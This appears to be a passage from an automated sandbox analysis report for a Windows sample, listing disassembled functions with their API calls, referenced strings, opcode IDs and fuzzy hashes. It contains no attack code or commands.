                                • Instruction Fuzzy Hash: 4541382204DBD6BECBBA8F3498A58F3FFF9AD97310369A9DDE4C145403C2115586E7A0
                                Function 06325D89 Relevance: .1, Instructions: 95COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c9f52e69266f64921673b8a5f076f082824a15793def8002bf476e99a4e871d
                                • Instruction ID: 093890b326f9fae75277af9ef7981d7158148261b5854e37fc1febef2c921481
                                • Opcode Fuzzy Hash: 2c9f52e69266f64921673b8a5f076f082824a15793def8002bf476e99a4e871d
                                • Instruction Fuzzy Hash: E821252204DBCABECB7A8F3498E58E3FFF9AD57310369A9CDE4C085403C2115586E7A0
                                Function 06325D6D Relevance: .1, Instructions: 73COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3849710870.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_6320000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e94e638ba1e09ebc6a1eecacf924f416c9b8850e26d1800b3f6b181a54c76f73
                                • Instruction ID: a5c4ed469d2ecbe53236111add732e99d9428c8c7847dd60ba94347b65bb8fdb
                                • Opcode Fuzzy Hash: e94e638ba1e09ebc6a1eecacf924f416c9b8850e26d1800b3f6b181a54c76f73
                                • Instruction Fuzzy Hash: ED11F52604E6C97DCB769F7498A48E3FFFAAD9B310369A9CDE5C085003C5124547E7A4
                                Function 00431882 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cb661421d0cbc1a6a407777b4be298e4ad0a098c8258ed1f8fd04651957c7f4e
                                • Instruction ID: d482dc5c5f4f5d9b530fd9f34f1641b322c892690f095ec24d58e192bba5419a
                                • Opcode Fuzzy Hash: cb661421d0cbc1a6a407777b4be298e4ad0a098c8258ed1f8fd04651957c7f4e
                                • Instruction Fuzzy Hash: A3F03032A11224EFDF1AD748D805E5973ACEB4AB65F115467E501D7260D3B4DD00C7C8
                                Function 004318C6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c4ba01c3ca842f244c402fef3ad5bf9d7a9ccc66e175a0f83c61bafc6002d44
                                • Instruction ID: 5c6917b0a1fa0f81874c5a7412129e4f460f181200b9693932849925fc2960c5
                                • Opcode Fuzzy Hash: 5c4ba01c3ca842f244c402fef3ad5bf9d7a9ccc66e175a0f83c61bafc6002d44
                                • Instruction Fuzzy Hash: 48E04672911238EBCB18EB89D944D8AB2ACEB49B44F11409AB501D3220C274DE00CBD8
                                Function 0042EC45 Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 525fefa8eedbc72395681fd105259806d3d12c30c224c9c87795d928887dac08
                                • Instruction ID: 778f82091a5d50db6e37ed98564b31aa7a95b53374400757ddc1faeb9885942e
                                • Opcode Fuzzy Hash: 525fefa8eedbc72395681fd105259806d3d12c30c224c9c87795d928887dac08
                                • Instruction Fuzzy Hash: E1C08C34200A90C6CE29DA1292B53A73394B3D1B82FD0148EC4020B782C52E9C86D60A
                                Function 003F3E60 Relevance: 32.0, APIs: 17, Strings: 1, Instructions: 470COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$Clear$_com_issue_error$Init$Copy
                                • String ID: open
                                • API String ID: 1711229386-2758837156
                                • Opcode ID: 590c04a3c1ce09e03022edbf41a1644e8e7bcb547060205e1c0055749676a958
                                • Instruction ID: d859e0b7b73fc69476e62faf7cf19818ec3131e3b62c95748ef7997125a54d94
                                • Opcode Fuzzy Hash: 590c04a3c1ce09e03022edbf41a1644e8e7bcb547060205e1c0055749676a958
                                • Instruction Fuzzy Hash: 66F11875E0025D9BDF11DFA8DC45BEEB7B4FF08314F14422AE905A7290E778AA80CB54
                                Function 003E2750 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 195windowthreadCOMMON
                                Download Yara Rule
                                APIs
                                • FormatMessageW.KERNEL32(00001200,00000000,?,00000400,?,00000100,00000000,A05DD77D), ref: 003E2863
                                • GetCurrentThreadId.KERNEL32 ref: 003E28D2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentFormatMessageThread
                                • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$LogNt$Msg:[%ws] $ReturnHr$ReturnNt$[%hs(%hs)]$[%hs]
                                • API String ID: 2411632146-1363043106
                                • Opcode ID: 8a4b6d94b23ed4b9677e6cf4467df126ccc037dff59b258d40f9543d199ed4ef
                                • Instruction ID: 26f922fea85b594cfa6e56c0d506b036d983d65e83a9fc6bd09563c1afe5b54a
                                • Opcode Fuzzy Hash: 8a4b6d94b23ed4b9677e6cf4467df126ccc037dff59b258d40f9543d199ed4ef
                                • Instruction Fuzzy Hash: BA61E674A00395ABEB259F26CC4AF67B7ACEB44704F04465DBC05572C2E7B4AD50CB64
                                Function 003F082D Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 162COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID:
                                • String ID: OnAppAbortWebView$OnAppErrorWebView$OnAppInitWebView$OnAppShutdownWebView$OnBrowserInitWebView
                                • API String ID: 0-3757888159
                                • Opcode ID: a3e34720728941d211d0f8c47a6e42f1776a57b43197121a4f98d57c39dcda5f
                                • Instruction ID: 3fa822e2d748ff5f748b9e653d2cf066b4bb6d87b5574dbfe72a5660cac22ff6
                                • Opcode Fuzzy Hash: a3e34720728941d211d0f8c47a6e42f1776a57b43197121a4f98d57c39dcda5f
                                • Instruction Fuzzy Hash: CA5125B1A4431DABFB36EB68DC05B797764AF00304F15046AE744A61A3FBF58D808B99
                                Function 004217D0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 205libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNEL32(?,FDICreate), ref: 00421865
                                • GetProcAddress.KERNEL32(?,FDICopy), ref: 004218A8
                                • GetProcAddress.KERNEL32(?,FDIDestroy), ref: 004218EB
                                • FreeLibrary.KERNEL32(00000000), ref: 00421946
                                • GetLastError.KERNEL32 ref: 004219B6
                                • GetLastError.KERNEL32 ref: 004219D8
                                • GetLastError.KERNEL32 ref: 004219FA
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressErrorLastProc$FreeLibrary
                                • String ID: @$Cabinet.dll$FDICopy$FDICreate$FDIDestroy
                                • API String ID: 329358263-233332848
                                • Opcode ID: 8daff8759ef4c95e3d55ff2d2a01b9ec1c3cc6e393138a95d1c58458916fe2cf
                                • Instruction ID: 7e04152c9aa67c5f3eb6a6bd4a1fce0fbeacfd2a0f89da8d9ddd5f815b82455f
                                • Opcode Fuzzy Hash: 8daff8759ef4c95e3d55ff2d2a01b9ec1c3cc6e393138a95d1c58458916fe2cf
                                • Instruction Fuzzy Hash: 5D61E174E012289FCB00DFA8E9557AE7BB4EB19700F10412FE912A73A1DF785905CBAD
                                Function 00425C3D Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00464694,00000FA0,?,?,00425C1B), ref: 00425C49
                                • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00425C1B), ref: 00425C54
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00425C1B), ref: 00425C65
                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00425C77
                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00425C85
                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00425C1B), ref: 00425CA8
                                • RtlDeleteCriticalSection.NTDLL(00464694), ref: 00425CC4
                                • CloseHandle.KERNEL32(00000000,?,?,00425C1B), ref: 00425CD4
                                Strings
                                • WakeAllConditionVariable, xrefs: 00425C7D
                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00425C4F
                                • kernel32.dll, xrefs: 00425C60
                                • SleepConditionVariableCS, xrefs: 00425C71
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                • API String ID: 2565136772-3242537097
                                • Opcode ID: 97edf29053753ac0aa98588afc30e1b02580f1683a61015aed69a14c21fd3ec4
                                • Instruction ID: 960df86cd94121aa738e23019e7eb226d932e50b98b6e8e23a4d624778daefac
                                • Opcode Fuzzy Hash: 97edf29053753ac0aa98588afc30e1b02580f1683a61015aed69a14c21fd3ec4
                                • Instruction Fuzzy Hash: 790179797417116BEB205F75FD09B5B3A98AB83701B140432FD09D2350FBBCC8508A5D
                                Function 003F30D0 Relevance: 18.2, APIs: 12, Instructions: 164COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003F3120
                                • VariantInit.OLEAUT32(?), ref: 003F313E
                                • VariantCopy.OLEAUT32(?,?), ref: 003F3148
                                • VariantInit.OLEAUT32(?), ref: 003F315E
                                • VariantCopy.OLEAUT32(?,?), ref: 003F3168
                                • VariantClear.OLEAUT32(?), ref: 003F31D6
                                • VariantClear.OLEAUT32(?), ref: 003F31DC
                                • VariantClear.OLEAUT32(?), ref: 003F31E2
                                  • Part of subcall function 003EEEB0: VariantInit.OLEAUT32(?), ref: 003EEEEA
                                  • Part of subcall function 003EEEB0: VariantChangeType.OLEAUT32(00000000,?,00000000,00000003), ref: 003EEF12
                                  • Part of subcall function 003EEEB0: VariantClear.OLEAUT32(00000000), ref: 003EEF23
                                  • Part of subcall function 003EEEB0: _com_issue_error.COMSUPP ref: 003EEF46
                                • _com_issue_error.COMSUPP ref: 003F3204
                                • _com_issue_error.COMSUPP ref: 003F320A
                                • VariantInit.OLEAUT32(A05DD77D), ref: 003F3244
                                • VariantClear.OLEAUT32(?), ref: 003F3297
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearInit$_com_issue_error$Copy$ChangeType
                                • String ID:
                                • API String ID: 3635750008-0
                                • Opcode ID: 7c88cb93736e9b3f27ba3a6ee7f9b23163d321b3628f702a965cc39b10bbd74a
                                • Instruction ID: 7b09e7d5885c32cb05e23736e530b296179c5cb4fc949075ae7bf8aa6ecf2570
                                • Opcode Fuzzy Hash: 7c88cb93736e9b3f27ba3a6ee7f9b23163d321b3628f702a965cc39b10bbd74a
                                • Instruction Fuzzy Hash: 75514775D0025DEBCB01DFA8CD45AEEBBB8FF49314F10462AE915B7250EB34AA44CB90
                                Function 003F3960 Relevance: 18.2, APIs: 12, Instructions: 164COMMON
                                Download Yara Rule
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 003F39B0
                                • VariantInit.OLEAUT32(?), ref: 003F39CE
                                • VariantCopy.OLEAUT32(?,?), ref: 003F39D8
                                • VariantInit.OLEAUT32(?), ref: 003F39EE
                                • VariantCopy.OLEAUT32(?,?), ref: 003F39F8
                                • VariantClear.OLEAUT32(?), ref: 003F3A66
                                • VariantClear.OLEAUT32(?), ref: 003F3A6C
                                • VariantClear.OLEAUT32(?), ref: 003F3A72
                                  • Part of subcall function 003EEF50: VariantInit.OLEAUT32(?), ref: 003EEF8A
                                  • Part of subcall function 003EEF50: VariantChangeType.OLEAUT32(00000000,?,00000000,00000016), ref: 003EEFB2
                                  • Part of subcall function 003EEF50: VariantClear.OLEAUT32(00000000), ref: 003EEFC3
                                  • Part of subcall function 003EEF50: _com_issue_error.COMSUPP ref: 003EEFE6
                                  • Part of subcall function 003EEF50: VariantClear.OLEAUT32 ref: 003EEFF1
                                • _com_issue_error.COMSUPP ref: 003F3A94
                                • _com_issue_error.COMSUPP ref: 003F3A9A
                                • VariantInit.OLEAUT32(A05DD77D), ref: 003F3AD4
                                • VariantClear.OLEAUT32(?), ref: 003F3B20
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$Clear$Init$_com_issue_error$Copy$ChangeType
                                • String ID:
                                • API String ID: 3696672285-0
                                • Opcode ID: 7f0117877a2eba61b92153fd04024803f8c1be6e9c17f7b4ba624fd7270eb593
                                • Instruction ID: 3f2395a5bea0854c095103d0c6f26716947303cbfba0d8e7043578a81aa486f9
                                • Opcode Fuzzy Hash: 7f0117877a2eba61b92153fd04024803f8c1be6e9c17f7b4ba624fd7270eb593
                                • Instruction Fuzzy Hash: 4F512375D0025DDBCF01DFA9CC45AEEBBB8FF48314F10462AE915A7250EB34AA44CBA4
                                Function 0040D740 Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 439threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0040D81C
                                • SysFreeString.OLEAUT32(?), ref: 0040DB76
                                  • Part of subcall function 003F52D0: GetCurrentThreadId.KERNEL32 ref: 003F52D9
                                  • Part of subcall function 0040DF40: QueryUnbiasedInterruptTime.KERNEL32(?,A05DD77D,?,00000000,?,0043D290,000000FF,?,0040DE6F,?), ref: 0040DEBC
                                  • Part of subcall function 0040DF40: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040DEEF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CurrentThread$FreeInterruptQueryStringTimeUnbiasedUnothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$failed to create controller -- not caching$failed to initialize COM$failed to update cache$trust$trust$update_cache
                                • API String ID: 212005684-576793877
                                • Opcode ID: 1977caced016c458e616f920845b8f074c622666fe99bd0510ebcb027483110d
                                • Instruction ID: 932357c31a8e493a80b1515e12d2968dd997392e1035726489a7cc0806910d8c
                                • Opcode Fuzzy Hash: 1977caced016c458e616f920845b8f074c622666fe99bd0510ebcb027483110d
                                • Instruction Fuzzy Hash: B0128B71D002689BDB21DFA0CC41BDEBBB4AF18304F1081EAE509B7291EB755E88CF95
                                Function 00427F14 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00428011
                                • type_info::operator==.LIBVCRUNTIME ref: 00428033
                                • ___TypeMatch.LIBVCRUNTIME ref: 00428142
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00428214
                                • _UnwindNestedFrames.LIBCMT ref: 00428298
                                • CallUnexpected.LIBVCRUNTIME ref: 004282B3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                • String ID: csm$csm$csm
                                • API String ID: 2123188842-393685449
                                • Opcode ID: bd6475a33020a316d1291ff0f27e035cc560cc4a3d3e0c93f283397e8e65fb70
                                • Instruction ID: d91aa22feb6c4486480b327d62d5d6c7c84aaf1269a519b4b20dca609bfd11cd
                                • Opcode Fuzzy Hash: bd6475a33020a316d1291ff0f27e035cc560cc4a3d3e0c93f283397e8e65fb70
                                • Instruction Fuzzy Hash: 2CB1CF31A01229DFCF18DF95E8419AEB7B5BF04314B90459FE8146B302CB38E911CFA9
                                Function 00411C19 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 208COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(00000000), ref: 00411DFC
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
